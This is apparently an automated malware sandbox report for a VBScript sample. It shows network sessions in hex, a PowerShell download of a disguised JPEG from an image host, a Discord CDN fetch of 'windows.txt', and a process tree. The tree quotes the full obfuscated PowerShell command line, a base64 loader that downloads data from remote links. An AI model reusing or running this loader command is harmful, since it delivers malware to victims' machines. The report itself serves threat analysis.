                2024-05-23 16:26:37 UTC1369INData Raw: 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9
                Data Ascii: scb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./
                2024-05-23 16:26:37 UTC1369INData Raw: 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92 76 91 64 0a 35 c0 20 fd
                Data Ascii: OKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>imvd5
                2024-05-23 16:26:37 UTC1369INData Raw: 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90 dd f1 0d 56 a5 f5 20
                Data Ascii: b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},zV
                2024-05-23 16:26:37 UTC1369INData Raw: 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49 23 08 05 05 e6 c6 03 83
                Data Ascii: Vx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI#
                2024-05-23 16:26:37 UTC1369INData Raw: 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8 60 43 fe 06 51
                Data Ascii: q#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@BH5`CQ
                2024-05-23 16:26:37 UTC1369INData Raw: 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2 dd 7c 6b 1e d3 78
                Data Ascii: }H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v|kx


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.1249721188.114.96.34436412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-05-23 16:26:41 UTC100OUTGET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1
                Host: uploaddeimagens.com.br
                2024-05-23 16:26:41 UTC698INHTTP/1.1 200 OK
                Date: Thu, 23 May 2024 16:26:41 GMT
                Content-Type: image/jpeg
                Content-Length: 4198361
                Connection: close
                Last-Modified: Tue, 23 Apr 2024 14:20:29 GMT
                ETag: "6627c3ad-400fd9"
                Cache-Control: max-age=2678400
                CF-Cache-Status: HIT
                Age: 4
                Accept-Ranges: bytes
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ttDTKcTh9mi4bQIw9yhDDlbQyDn75scHPr4VC%2BkOIMJ8xBk8ApLO6sgWfCTBm%2FQDNcdLfx7XJp1MQSFvsavBO8lw21BEjhkPqkmkx0u73Zj0%2Bn%2Bgjkdv7oSIuthvtzT%2BiRPim%2Bsp2yL"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 888668b90ac35590-EWR
                alt-svc: h3=":443"; ma=86400
                2024-05-23 16:26:41 UTC671INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                2024-05-23 16:26:41 UTC1369INData Raw: af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9
                Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
                2024-05-23 16:26:41 UTC1369INData Raw: 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a
                Data Ascii: VH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$j
                2024-05-23 16:26:41 UTC1369INData Raw: 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df
                Data Ascii: \mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
                2024-05-23 16:26:41 UTC1369INData Raw: 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84
                Data Ascii: >2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^
                2024-05-23 16:26:41 UTC1369INData Raw: 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6
                Data Ascii: 4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
                2024-05-23 16:26:41 UTC1369INData Raw: 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c
                Data Ascii: :T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},
                2024-05-23 16:26:41 UTC1369INData Raw: 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53
                Data Ascii: Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rS
                2024-05-23 16:26:41 UTC1369INData Raw: 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16
                Data Ascii: W_4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@
                2024-05-23 16:26:41 UTC1369INData Raw: ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e
                Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.1249722162.159.129.2334436412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-05-23 16:26:49 UTC224OUTGET /attachments/1235627023511191643/1235641626869764136/windows.txt?ex=66351c70&is=6633caf0&hm=afaee1daa8e0485d79f5ee7e2461094a5fe88bfe3663435697c99103a2dc00f0& HTTP/1.1
                Host: cdn.discordapp.com
                Connection: Keep-Alive
                2024-05-23 16:26:49 UTC1053INHTTP/1.1 404 Not Found
                Date: Thu, 23 May 2024 16:26:49 GMT
                Content-Type: text/plain;charset=UTF-8
                Content-Length: 36
                Connection: close
                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                Set-Cookie: __cf_bm=qPUi_QfVuHGtQkNJEvr.HuVJjh4FDDQ6kclPajtGcqU-1716481609-1.0.1.1-.8N4lP.U.c.R0jq3zYmwBncVCvq0f9DD10GpKZSGAI.KyyrW1Ua7aSmhzFrqCNerzxhaxiOHqnULsTMIQSjGew; path=/; expires=Thu, 23-May-24 16:56:49 GMT; domain=.discordapp.com; HttpOnly; Secure
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eDhkyx05aGgkNWBn5gMHkSwoNh08OwTquqPJhgs%2Fx1TfzOCN58F%2Bj9wCpFIdxIYbl1XvHd1VIAaK%2FXXgrCt01f%2BRPKapISKG%2BR6af3gyMyB387UcIpt1IGns%2FUTpWUAxZ6p7eg%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Set-Cookie: _cfuvid=9NCGozscaYYydFkivz9.21W41v9nWaQ2XngpvlaA9e4-1716481609883-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                Server: cloudflare
                CF-RAY: 888668edabd30f91-EWR
                alt-svc: h3=":443"; ma=86400
                2024-05-23 16:26:49 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                Data Ascii: This content is no longer available.


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:12:26:11
                Start date:23/05/2024
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs"
                Imagebase:0x7ff613680000
                File size:170'496 bytes
                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:6
                Start time:12:26:31
                Start date:23/05/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgT